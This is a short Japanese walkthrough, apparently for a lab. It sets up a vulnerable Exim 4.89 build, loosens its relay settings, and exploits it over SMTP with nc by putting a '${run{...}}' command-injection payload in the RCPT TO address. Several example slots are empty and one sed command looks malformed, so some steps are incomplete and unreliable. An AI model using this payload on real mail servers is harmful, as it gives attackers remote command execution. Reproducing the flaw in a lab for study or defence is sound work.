脆弱なバージョンのEximのインストールとその悪用の手順 Linux Ubuntu 16.04、Exim 4.89でテスト済み
Eximバージョン4.89をダウンロードして展開
展開したフォルダに移動
必要な設定ファイルをコピーして修正
sed -e 's,^EXIM_USER. * $,EXIM_USER=exim,' Local/Makefile src/EDITME > Local/Makefile
cp exim_monitor/EDITME Local/eximon.conf
eximユーザーとグループを作成
sudo groupadd -g 31 exim
sudo useradd -d /dev/null -c "Exim Daemon" -g exim -s /bin/false -u 31 exim
依存関係をインストール
Exim 4.89をインストール
リレーを許可するために/usr/exim/configureを編集(7日間待たずに悪用できるようにする)
eximユーザーとしてeximを実行
シェルコマンドを16進数に変換します。例:
例の表:
まずncを使用してサーバーに接続します。
接続したらHELOを送信します。
次に、送信者アドレスを空に設定します。
次に、以前作成したペイロードを埋め込んだ受信者アドレスを設定します。省略記号の部分に目的のコマンドを挿入します: rcpt to:${run{...}}@localhost。
最後に、DATAを入力した後、31行のヘッダー、空行、そしてピリオドを入力します。